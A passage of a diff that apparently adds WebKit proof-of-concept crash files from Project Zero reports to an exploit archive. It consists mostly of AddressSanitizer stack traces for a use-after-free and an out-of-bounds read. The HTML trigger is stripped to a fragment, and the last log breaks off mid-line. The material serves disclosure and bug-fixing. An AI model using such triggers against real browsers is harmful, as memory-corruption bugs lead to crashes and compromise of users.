WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) + #5 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) + #6 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) + #7 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) + #8 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) + #9 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #10 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #11 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #12 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #13 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #14 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #15 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #16 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #17 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #18 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #19 0x10983356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #20 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x603000346940 is located 16 bytes inside of 24-byte region [0x603000346930,0x603000346948) +freed by thread T0 here: + #0 0x10ca9c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x11ffee650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x11300fccb in WTF::ListHashSet >::deleteAllNodes() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f0ccb) + #3 0x113007edd in WTF::ListHashSet >::clear() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8edd) + #4 0x113007d30 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8d30) + #5 0x1139a3d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a) + #6 0x1135afb10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) + #7 0x1135b6542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542) + #8 0x1137764b1 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9574b1) + #9 0x112e437cc in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x247cc) + #10 0x112e47a63 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a63) + #11 0x112e47dce in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28dce) + #12 0x112e40a59 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a59) + #13 0x112e47eec in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28eec) + #14 0x112e79f53 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5af53) + #15 0x112e613eb in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x423eb) + #16 0x112ff54b1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d64b1) + #17 0x112ff377f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d477f) + #18 0x112ff8bbd in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9bbd) + #19 0x113007cea in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cea) + #20 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) + #21 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) + #22 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) + #23 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) + #24 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) + #25 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) + #26 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #27 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #28 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #29 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + +previously allocated by thread T0 here: + #0 0x10ca9bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11ffeead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11ffecd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11ff73247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11ff7263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x113011c38 in WTF::ListHashSetNode::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f2c38) + #7 0x113020d79 in void WTF::ListHashSetTranslator >::translate, WebCore::Node* const&, std::nullptr_t>(WTF::ListHashSetNode*&, WebCore::Node* const&&&, std::nullptr_t&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x201d79) + #8 0x112ffbec9 in WTF::ListHashSet >::add(WebCore::Node* const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dcec9) + #9 0x112ffb785 in WebCore::AXObjectCache::deferTextChangedIfNeeded(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dc785) + #10 0x11376c58e in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d58e) + #11 0x11377298d in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95398d) + #12 0x1137727a1 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9537a1) + #13 0x11376bf12 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cf12) + #14 0x11376bd0b in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cd0b) + #15 0x114443e31 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1624e31) + #16 0x1144392e8 in long long WebCore::IDLOperation::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x161a2e8) + #17 0x3c5768201027 () + #18 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #19 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #20 0x11f91ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #21 0x11f583847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #22 0x11f50488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #23 0x11eb1d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #24 0x11eb1d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #25 0x11eb1dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #26 0x11405d615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #27 0x1144706cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #28 0x1137dc010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #29 0x1137dbae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) in WTF::ListHashSetConstIterator >::operator++() +Shadow bytes around the buggy address: + 0x1c0600068cd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd + 0x1c0600068ce0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa + 0x1c0600068cf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa + 0x1c0600068d00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd + 0x1c0600068d10: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa +=>0x1c0600068d20: fd fd fd fa fa fa fd fd[fd]fa fa fa 00 00 00 02 + 0x1c0600068d30: fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa fd fd + 0x1c0600068d40: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa + 0x1c0600068d50: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa + 0x1c0600068d60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd + 0x1c0600068d70: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30369==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43170.js b/platforms/multiple/dos/43170.js new file mode 100644 index 000000000..709714fe5 --- /dev/null +++ b/platforms/multiple/dos/43170.js @@ -0,0 +1,178 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1348 + +There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + ++
+

I>EO~P

+ +/* +================================================================= + +ASan log: + +================================================================= +==30388==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000f5de6 at pc 0x00010ff1c575 bp 0x7fff5a427300 sp 0x7fff5a4272f8 +READ of size 2 at 0x6030000f5de6 thread T0 +==30388==WARNING: invalid path to external symbolizer! +==30388==WARNING: Failed to use and restart external symbolizer! + #0 0x10ff1c574 in WTF::StringImpl::at(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574) + #1 0x110edd834 in WebCore::InlineTextBox::isLineBreak() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfec834) + #2 0x110ee587f in WebCore::InlineTextBox::positionForOffset(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xff487f) + #3 0x1127d5bda in WebCore::RenderText::localCaretRect(WebCore::InlineBox*, unsigned int, WebCore::LayoutUnit*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28e4bda) + #4 0x112fd2830 in WebCore::VisiblePosition::localCaretRect(WebCore::RenderObject*&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e1830) + #5 0x1107e0e5d in WebCore::localCaretRectInRendererForCaretPainting(WebCore::VisiblePosition const&, WebCore::RenderBlock*&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8efe5d) + #6 0x110a5912d in WebCore::CaretBase::updateCaretRect(WebCore::Document*, WebCore::VisiblePosition const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb6812d) + #7 0x110a6377b in WebCore::FrameSelection::recomputeCaretRect() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb7277b) + #8 0x110a5b2f8 in WebCore::FrameSelection::updateAppearance() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb6a2f8) + #9 0x110a5aee7 in WebCore::FrameSelection::updateAndRevealSelection(WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb69ee7) + #10 0x110a67a6f in WebCore::FrameSelection::updateAppearanceAfterLayoutOrStyleChange() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb76a6f) + #11 0x110a6d63a in WebCore::FrameView::performPostLayoutTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb7c63a) + #12 0x110a75d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a) + #13 0x110681b10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) + #14 0x110688542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542) + #15 0x11061562b in WebCore::DeleteSelectionCommand::fixupWhitespace() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x72462b) + #16 0x1106178f3 in WebCore::DeleteSelectionCommand::doApply() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7268f3) + #17 0x1102a19fa in WebCore::CompositeEditCommand::applyCommandToComposite(WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b09fa) + #18 0x1102a653a in WebCore::CompositeEditCommand::deleteSelection(WebCore::VisibleSelection const&, bool, bool, bool, bool, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b553a) + #19 0x112ede1d5 in WebCore::TypingCommand::deleteKeyPressed(WebCore::TextGranularity, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fed1d5) + #20 0x112eddab3 in WebCore::TypingCommand::deleteKeyPressed(WebCore::Document&, unsigned int, WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fecab3) + #21 0x110823470 in WebCore::executeDelete(WebCore::Frame&, WebCore::Event*, WebCore::EditorCommandSource, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x932470) + #22 0x110821ab3 in WebCore::Editor::Command::execute(WTF::String const&, WebCore::Event*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x930ab3) + #23 0x1106a200a in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b100a) + #24 0x111297593 in WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13a6593) + #25 0x11127f068 in long long WebCore::IDLOperation::call<&(WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x138e068) + #26 0x4e397e001027 () + #27 0x11c9f8e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #28 0x11c9f8e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #29 0x11c9f1f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #30 0x11c655847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #31 0x11c5d688a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #32 0x11bbef731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #33 0x11bbef9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #34 0x11bbefd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #35 0x11112f615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #36 0x1115426cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #37 0x1108ae010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #38 0x1108adae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #39 0x11078b051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #40 0x11079ac0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #41 0x11068db0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #42 0x110687bad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #43 0x110a3a3ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #44 0x110a3775c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #45 0x1106a7523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + #46 0x110c2b5d0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0) + #47 0x110748693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693) + #48 0x110709736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #49 0x110185047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #50 0x11017ddf1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #51 0x112c55661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #52 0x10630143b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) 